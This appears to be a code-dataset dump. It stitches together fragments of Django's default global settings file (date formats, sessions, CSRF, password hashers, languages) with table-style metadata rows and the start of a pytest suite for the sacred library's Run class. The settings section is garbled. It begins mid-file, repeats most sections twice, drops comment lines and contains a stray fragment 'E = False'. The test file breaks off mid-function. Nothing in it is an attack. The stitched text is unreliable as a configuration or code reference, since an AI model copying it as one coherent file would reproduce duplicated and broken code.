# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
# (runserver) will use. If `None`, the return value of
# 'django.core.wsgi.get_wsgi_application' is used, thus preserving the same
# behavior as previous versions of Django. Otherwise this should point to an
# actual WSGI application object.
WSGI_APPLICATION = None
# If your Django app is behind a proxy that sets a header to specify secure
# connections, AND that proxy ensures that user-submitted headers with the
# same name are ignored (so that people can't spoof it), set this value to
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
# you may be opening yourself up to a security risk.
SECURE_PROXY_SSL_HEADER = None
##############
# MIDDLEWARE #
##############
# List of middleware to use. Order is important; in the request phase, these
# middleware will be applied in the order given, and in the response
# phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = [
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
]
MIDDLEWARE = None
############
# SESSIONS #
############
# Cache to store session data if using the cache session backend.
SESSION_CACHE_ALIAS = 'default'
# Cookie name. This can be whatever you want.
SESSION_COOKIE_NAME = 'sessionid'
# Age of cookie, in seconds (default: 2 weeks).
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2
# A string like ".example.com", or None for standard domain cookie.
SESSION_COOKIE_DOMAIN = None
# Whether the session cookie should be secure (https:// only).
SESSION_COOKIE_SECURE = False
# The path of the session cookie.
SESSION_COOKIE_PATH = '/'
# Whether to use the non-RFC standard httpOnly flag (IE, FF3+, others)
SESSION_COOKIE_HTTPONLY = True
# Whether to save the session data on every request.
SESSION_SAVE_EVERY_REQUEST = False
# Whether a user's session cookie expires when the Web browser is closed.
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
AUTH_USER_MODEL = 'auth.User'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
# (only apps with migrations are to start with)
TEST_NON_SERIALIZED_APPS = []
############
# FIXTURES #
############
# The list of directories to search for fixtures
FIXTURE_DIRS = []
###############
# STATICFILES #
###############
# A list of locations of additional static files
STATICFILES_DIRS = []
# The default file storage backend used during the build process
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
]
##############
# MIGRATIONS #
##############
# Migration module overrides for apps, by app label.
MIGRATION_MODULES = {}
#################
# SYSTEM CHECKS #
#################
# List of all issues generated by system checks that should be silenced. Light
# issues like warnings, infos or debugs will not generate a message. Silencing
# serious issues like errors and criticals does not result in hiding the
# message, but Django will not stop you from e.g. running server.
SILENCED_SYSTEM_CHECKS = []
#######################
# SECURITY MIDDLEWARE #
#######################
SECURE_BROWSER_XSS_FILTER = False
SECURE_CONTENT_TYPE_NOSNIFF = False
SECURE_HSTS_INCLUDE_SUBDOMAINS = False
SECURE_HSTS_PRELOAD = False
SECURE_HSTS_SECONDS = 0
SECURE_REDIRECT_EXEMPT = []
SECURE_SSL_HOST = None
SECURE_SSL_REDIRECT = False
| 34.454969 | 103 | 0.703006 |
from __future__ import unicode_literals
# django.utils.translation -- that module depends on the settings.
def gettext_noop(s):
return s
####################
# CORE #
####################
DEBUG = False
# Whether the framework should propagate raw exceptions rather than catching
# them. This is useful under some testing situations and should never be used
# on a live site.
DEBUG_PROPAGATE_EXCEPTIONS = False
# Whether to use the "ETag" header. This saves bandwidth but slows down performance.
# Deprecated (RemovedInDjango21Warning) in favor of ConditionalGetMiddleware
# which sets the ETag regardless of this setting.
USE_ETAGS = False
# People who get code error notifications.
# In the format [('Full Name', 'email@example.com'), ('Full Name', 'anotheremail@example.com')]
ADMINS = []
# List of IP addresses, as strings, that:
# * See debug comments, when DEBUG is true
# * Receive x-headers
INTERNAL_IPS = []
# Hosts/domain names that are valid for this site.
# "*" matches anything, ".example.com" matches example.com and all subdomains
ALLOWED_HOSTS = []
# Local time zone for this installation. All choices can be found here:
# https://en.wikipedia.org/wiki/List_of_tz_zones_by_name (although not all
# systems may support all possibilities). When USE_TZ is True, this is
# interpreted as the default user time zone.
TIME_ZONE = 'America/Chicago'
# If you set this to True, Django will use timezone-aware datetimes.
USE_TZ = False
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages we provide translations for, out of the box.
LANGUAGES = [
('af', gettext_noop('Afrikaans')),
('ar', gettext_noop('Arabic')),
('ast', gettext_noop('Asturian')),
('az', gettext_noop('Azerbaijani')),
('bg', gettext_noop('Bulgarian')),
('be', gettext_noop('Belarusian')),
('bn', gettext_noop('Bengali')),
('br', gettext_noop('Breton')),
('bs', gettext_noop('Bosnian')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('cy', gettext_noop('Welsh')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('dsb', gettext_noop('Lower Sorbian')),
('el', gettext_noop('Greek')),
('en', gettext_noop('English')),
('en-au', gettext_noop('Australian English')),
('en-gb', gettext_noop('British English')),
('eo', gettext_noop('Esperanto')),
('es', gettext_noop('Spanish')),
('es-ar', gettext_noop('Argentinian Spanish')),
('es-co', gettext_noop('Colombian Spanish')),
('es-mx', gettext_noop('Mexican Spanish')),
('es-ni', gettext_noop('Nicaraguan Spanish')),
('es-ve', gettext_noop('Venezuelan Spanish')),
('et', gettext_noop('Estonian')),
('eu', gettext_noop('Basque')),
('fa', gettext_noop('Persian')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('fy', gettext_noop('Frisian')),
('ga', gettext_noop('Irish')),
('gd', gettext_noop('Scottish Gaelic')),
('gl', gettext_noop('Galician')),
('he', gettext_noop('Hebrew')),
('hi', gettext_noop('Hindi')),
('hr', gettext_noop('Croatian')),
('hsb', gettext_noop('Upper Sorbian')),
('hu', gettext_noop('Hungarian')),
('ia', gettext_noop('Interlingua')),
('id', gettext_noop('Indonesian')),
('io', gettext_noop('Ido')),
('is', gettext_noop('Icelandic')),
('it', gettext_noop('Italian')),
('ja', gettext_noop('Japanese')),
('ka', gettext_noop('Georgian')),
('kk', gettext_noop('Kazakh')),
('km', gettext_noop('Khmer')),
('kn', gettext_noop('Kannada')),
('ko', gettext_noop('Korean')),
('lb', gettext_noop('Luxembourgish')),
('lt', gettext_noop('Lithuanian')),
('lv', gettext_noop('Latvian')),
('mk', gettext_noop('Macedonian')),
('ml', gettext_noop('Malayalam')),
('mn', gettext_noop('Mongolian')),
('mr', gettext_noop('Marathi')),
('my', gettext_noop('Burmese')),
('nb', gettext_noop('Norwegian Bokmål')),
('ne', gettext_noop('Nepali')),
('nl', gettext_noop('Dutch')),
('nn', gettext_noop('Norwegian Nynorsk')),
('os', gettext_noop('Ossetic')),
('pa', gettext_noop('Punjabi')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('sl', gettext_noop('Slovenian')),
('sq', gettext_noop('Albanian')),
('sr', gettext_noop('Serbian')),
('sr-latn', gettext_noop('Serbian Latin')),
('sv', gettext_noop('Swedish')),
('sw', gettext_noop('Swahili')),
('ta', gettext_noop('Tamil')),
('te', gettext_noop('Telugu')),
('th', gettext_noop('Thai')),
('tr', gettext_noop('Turkish')),
('tt', gettext_noop('Tatar')),
('udm', gettext_noop('Udmurt')),
('uk', gettext_noop('Ukrainian')),
('ur', gettext_noop('Urdu')),
('vi', gettext_noop('Vietnamese')),
('zh-hans', gettext_noop('Simplified Chinese')),
('zh-hant', gettext_noop('Traditional Chinese')),
]
# Languages using BiDi (right-to-left) layout
LANGUAGES_BIDI = ["he", "ar", "fa", "ur"]
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
LOCALE_PATHS = []
# Settings for language cookie
LANGUAGE_COOKIE_NAME = 'django_language'
LANGUAGE_COOKIE_AGE = None
LANGUAGE_COOKIE_DOMAIN = None
LANGUAGE_COOKIE_PATH = '/'
# If you set this to True, Django will format dates, numbers and calendars
# according to user current locale.
USE_L10N = False
# Not-necessarily-technical managers of the site. They get broken link
# notifications and other various emails.
MANAGERS = ADMINS
# Default content type and charset to use for all HttpResponse objects, if a
# MIME type isn't manually specified. These are used to construct the
DEFAULT_CONTENT_TYPE = 'text/html'
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_EMAIL = 'root@localhost'
DATABASES = {}
DATABASE_ROUTERS = []
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'localhost'
EMAIL_PORT = 25
EMAIL_USE_LOCALTIME = False
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = False
EMAIL_USE_SSL = False
EMAIL_SSL_CERTFILE = None
EMAIL_SSL_KEYFILE = None
EMAIL_TIMEOUT = None
INSTALLED_APPS = []
TEMPLATES = []
FORM_RENDERER = 'django.forms.renderers.DjangoTemplates'
DEFAULT_FROM_EMAIL = 'webmaster@localhost'
EMAIL_SUBJECT_PREFIX = '[Django] '
APPEND_SLASH = True
PREPEND_WWW = False
# Override the server-derived value of SCRIPT_NAME
FORCE_SCRIPT_NAME = None
# List of compiled regular expression objects representing User-Agent strings
# that are not allowed to visit any page, systemwide. Use this for bad
# robots/crawlers. Here are a few examples:
# import re
# DISALLOWED_USER_AGENTS = [
# re.compile(r'^NaverBot.*'),
# re.compile(r'^EmailSiphon.*'),
# re.compile(r'^SiteSucker.*'),
# re.compile(r'^sohu-search')
# ]
DISALLOWED_USER_AGENTS = []
ABSOLUTE_URL_OVERRIDES = {}
# List of compiled regular expression objects representing URLs that need not
# be reported by BrokenLinkEmailsMiddleware. Here are a few examples:
# import re
# IGNORABLE_404_URLS = [
# re.compile(r'^/apple-touch-icon.*\.png$'),
# re.compile(r'^/favicon.ico$),
# re.compile(r'^/phpmyadmin/),
IGNORABLE_404_URLS = []
SECRET_KEY = ''
DEFAULT_FILE_STORAGE = 'django.core.files.storage.FileSystemStorage'
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = None
STATIC_URL = None
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.MemoryFileUploadHandler',
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
FILE_UPLOAD_MAX_MEMORY_SIZE = 2621440
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000
# (i.e. "/tmp" on *nix systems).
FILE_UPLOAD_TEMP_DIR = None
# The numeric mode to set newly-uploaded files to. The value should be a mode
# you'd pass directly to os.chmod; see https://docs.python.org/3/library/os.html
FILE_UPLOAD_PERMISSIONS = None
# see https://docs.python.org/3/library/os.html#files-and-directories.
FILE_UPLOAD_DIRECTORY_PERMISSIONS = None
# Python module path where user will place custom format definition.
# The directory where this setting is pointing should contain subdirectories
# named as the locales, containing a formats.py file
# (i.e. "myproject.locale" for myproject/locale/en/formats.py etc. use)
FORMAT_MODULE_PATH = None
# Default formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'N j, Y'
# Default formatting for datetime objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATETIME_FORMAT = 'N j, Y, P'
# Default formatting for time objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
TIME_FORMAT = 'P'
# Default formatting for date objects when only the year and month are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
YEAR_MONTH_FORMAT = 'F Y'
# Default formatting for date objects when only the month and day are relevant.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
MONTH_DAY_FORMAT = 'F j'
# Default short formatting for date objects. See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATE_FORMAT = 'm/d/Y'
# Default short formatting for datetime objects.
# See all available format strings here:
# http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
SHORT_DATETIME_FORMAT = 'm/d/Y P'
# Default formats to be used when parsing dates from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATE_INPUT_FORMATS = [
'%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '10/25/2006', '10/25/06'
'%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'
'%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'
'%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'
'%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'
]
# Default formats to be used when parsing times from input boxes, in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
TIME_INPUT_FORMATS = [
'%H:%M:%S', # '14:30:59'
'%H:%M:%S.%f', # '14:30:59.000200'
'%H:%M', # '14:30'
]
# Default formats to be used when parsing dates and times from input boxes,
# in order
# See all available format string here:
# http://docs.python.org/library/datetime.html#strftime-behavior
# * Note that these format strings are different from the ones to display dates
DATETIME_INPUT_FORMATS = [
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%m/%d/%Y %H:%M:%S', # '10/25/2006 14:30:59'
'%m/%d/%Y %H:%M:%S.%f', # '10/25/2006 14:30:59.000200'
'%m/%d/%Y %H:%M', # '10/25/2006 14:30'
'%m/%d/%Y', # '10/25/2006'
'%m/%d/%y %H:%M:%S', # '10/25/06 14:30:59'
'%m/%d/%y %H:%M:%S.%f', # '10/25/06 14:30:59.000200'
'%m/%d/%y %H:%M', # '10/25/06 14:30'
'%m/%d/%y', # '10/25/06'
]
# First day of week, to be used on calendars
# 0 means Sunday, 1 means Monday...
FIRST_DAY_OF_WEEK = 0
# Decimal separator symbol
DECIMAL_SEPARATOR = '.'
# Boolean that sets whether to add thousand separator when formatting numbers
USE_THOUSAND_SEPARATOR = False
# Number of digits that will be together, when splitting them by
# THOUSAND_SEPARATOR. 0 means no grouping, 3 means splitting by thousands...
NUMBER_GROUPING = 0
# Thousand separator symbol
THOUSAND_SEPARATOR = ','
# The tablespaces to use for each model when not specified otherwise.
DEFAULT_TABLESPACE = ''
DEFAULT_INDEX_TABLESPACE = ''
# Default X-Frame-Options header value
X_FRAME_OPTIONS = 'SAMEORIGIN'
USE_X_FORWARDED_HOST = False
USE_X_FORWARDED_PORT = False
# The Python dotted path to the WSGI application that Django's internal server
WSGI_APPLICATION = None
# a tuple of (header_name, header_value). For any requests that come in with
# that header/value, request.is_secure() will return True.
# WARNING! Only set this if you fully understand what you're doing. Otherwise,
SECURE_PROXY_SSL_HEADER = None
E = False
SESSION_COOKIE_PATH = '/'
SESSION_COOKIE_HTTPONLY = True
SESSION_SAVE_EVERY_REQUEST = False
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# The module to store session data
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Directory to store session files if using the file session module. If None,
# the backend will use a sensible default.
SESSION_FILE_PATH = None
# class to serialize session data
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
#########
# CACHE #
#########
# The cache backends to use.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
CACHE_MIDDLEWARE_KEY_PREFIX = ''
CACHE_MIDDLEWARE_SECONDS = 600
CACHE_MIDDLEWARE_ALIAS = 'default'
##################
# AUTHENTICATION #
##################
AUTH_USER_MODEL = 'auth.User'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/accounts/profile/'
LOGOUT_REDIRECT_URL = None
# The number of days a password reset link is valid for
PASSWORD_RESET_TIMEOUT_DAYS = 3
# the first hasher in this list is the preferred algorithm. any
# password using different algorithms will be converted automatically
# upon login
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = []
###########
# SIGNING #
###########
SIGNING_BACKEND = 'django.core.signing.TimestampSigner'
########
# CSRF #
########
# Dotted path to callable to be used as view when a request is
# rejected by the CSRF middleware.
CSRF_FAILURE_VIEW = 'django.views.csrf.csrf_failure'
# Settings for CSRF cookie.
CSRF_COOKIE_NAME = 'csrftoken'
CSRF_COOKIE_AGE = 60 * 60 * 24 * 7 * 52
CSRF_COOKIE_DOMAIN = None
CSRF_COOKIE_PATH = '/'
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = False
CSRF_HEADER_NAME = 'HTTP_X_CSRFTOKEN'
CSRF_TRUSTED_ORIGINS = []
CSRF_USE_SESSIONS = False
############
# MESSAGES #
############
# Class to use as messages backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.fallback.FallbackStorage'
# Default values of MESSAGE_LEVEL and MESSAGE_TAGS are defined within
# django.contrib.messages to avoid imports in this settings file.
###########
# LOGGING #
###########
# The callable to use to configure logging
LOGGING_CONFIG = 'logging.config.dictConfig'
# Custom logging configuration.
LOGGING = {}
# Default exception reporter filter class used in case none has been
# specifically assigned to the HttpRequest instance.
DEFAULT_EXCEPTION_REPORTER_FILTER = 'django.views.debug.SafeExceptionReporterFilter'
###########
# TESTING #
###########
# The name of the class to use to run the test suite
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Apps that don't need to be serialized at test database creation time
TEST_NON_SERIALIZED_APPS = []
| true | true |
f732689a19695848c73536abbc88f78ed5fd6d88 | 8,182 | py | Python | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 2 | 2016-10-24T10:26:03.000Z | 2016-10-31T15:22:13.000Z | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 5 | 2016-10-22T15:46:11.000Z | 2017-06-29T11:19:11.000Z | tests/test_run.py | martinxyz/sacred | fa452e4eacf29caa59fb46c274a519669d6b4790 | [
"MIT"
] | 1 | 2020-04-11T14:44:42.000Z | 2020-04-11T14:44:42.000Z | #!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
from datetime import datetime
import mock
import os
import pytest
import tempfile
import sys
from sacred.run import Run
from sacred.config.config_summary import ConfigSummary
from sacred.utils import (ObserverError, SacredInterrupt, TimeoutInterrupt,
apply_backspaces_and_linefeeds)
@pytest.fixture
def run():
config = {'a': 17, 'foo': {'bar': True, 'baz': False}, 'seed': 1234}
config_mod = ConfigSummary()
signature = mock.Mock()
signature.name = 'main_func'
main_func = mock.Mock(return_value=123, prefix='', signature=signature)
logger = mock.Mock()
observer = [mock.Mock(priority=10)]
return Run(config, config_mod, main_func, observer, logger, logger, {},
{}, [], [])
def test_run_attributes(run):
assert isinstance(run.config, dict)
assert isinstance(run.config_modifications, ConfigSummary)
assert isinstance(run.experiment_info, dict)
assert isinstance(run.host_info, dict)
assert isinstance(run.info, dict)
def test_run_state_attributes(run):
assert run.start_time is None
assert run.stop_time is None
assert run.captured_out == ''
assert run.result is None
def test_run_run(run):
assert run() == 123
assert (run.start_time - datetime.utcnow()).total_seconds() < 1
assert (run.stop_time - datetime.utcnow()).total_seconds() < 1
assert run.result == 123
assert run.captured_out == ''
def test_run_emits_events_if_successful(run):
run()
observer = run.observers[0]
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
@pytest.mark.parametrize('exception,status', [
(KeyboardInterrupt, 'INTERRUPTED'),
(SacredInterrupt, 'INTERRUPTED'),
(TimeoutInterrupt, 'TIMEOUT'),
])
def test_run_emits_events_if_interrupted(run, exception, status):
observer = run.observers[0]
run.main_function.side_effect = exception
with pytest.raises(exception):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert observer.interrupted_event.called
observer.interrupted_event.assert_called_with(
interrupt_time=run.stop_time,
status=status)
assert not observer.failed_event.called
def test_run_emits_events_if_failed(run):
observer = run.observers[0]
run.main_function.side_effect = TypeError
with pytest.raises(TypeError):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert observer.failed_event.called
def test_run_started_event(run):
observer = run.observers[0]
run()
observer.started_event.assert_called_with(
command='main_func',
ex_info=run.experiment_info,
host_info=run.host_info,
start_time=run.start_time,
config=run.config,
meta_info={},
_id=None
)
def test_run_completed_event(run):
observer = run.observers[0]
run()
observer.completed_event.assert_called_with(
stop_time=run.stop_time,
result=run.result
)
def test_run_heartbeat_event(run):
observer = run.observers[0]
run.info['test'] = 321
run()
call_args, call_kwargs = observer.heartbeat_event.call_args_list[0]
assert call_kwargs['info'] == run.info
assert call_kwargs['captured_out'] == ""
assert (call_kwargs['beat_time'] - datetime.utcnow()).total_seconds() < 1
def test_run_artifact_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
metadata = {'testkey': 42}
run.add_artifact(f_name, name='foobar', metadata=metadata)
observer.artifact_event.assert_called_with(filename=f_name, name='foobar', metadata=metadata)
os.close(handle)
os.remove(f_name)
def test_run_resource_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
run.open_resource(f_name)
observer.resource_event.assert_called_with(filename=f_name)
os.close(handle)
os.remove(f_name)
def test_run_cannot_be_started_twice(run):
run()
with pytest.raises(RuntimeError):
run()
def test_run_observer_failure_on_startup_not_caught(run):
observer = run.observers[0]
observer.started_event.side_effect = ObserverError
with pytest.raises(ObserverError):
run()
def test_run_observer_error_in_heartbeat_is_caught(run):
observer = run.observers[0]
observer.heartbeat_event.side_effect = TypeError
run()
assert observer in run._failed_observers
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
def test_run_exception_in_completed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.completed_event.side_effect = TypeError
run()
assert observer.completed_event.called
assert observer2.completed_event.called
def test_run_exception_in_interrupted_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.interrupted_event.side_effect = TypeError
run.main_function.side_effect = KeyboardInterrupt
with pytest.raises(KeyboardInterrupt):
run()
assert observer.interrupted_event.called
assert observer2.interrupted_event.called
def test_run_exception_in_failed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.failed_event.side_effect = TypeError
run.main_function.side_effect = AttributeError
with pytest.raises(AttributeError):
run()
assert observer.failed_event.called
assert observer2.failed_event.called
def test_unobserved_run_doesnt_emit(run):
observer = run.observers[0]
run.unobserved = True
run()
assert not observer.started_event.called
assert not observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
def test_stdout_capturing_no(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "no"
with capsys.disabled():
run()
assert run.captured_out == ''
def test_stdout_capturing_sys(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
# @pytest.mark.skipif(sys.platform.startswith('win'),
# reason="does not work on windows")
@pytest.mark.skip('Breaks randomly on test server')
def test_stdout_capturing_fd(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
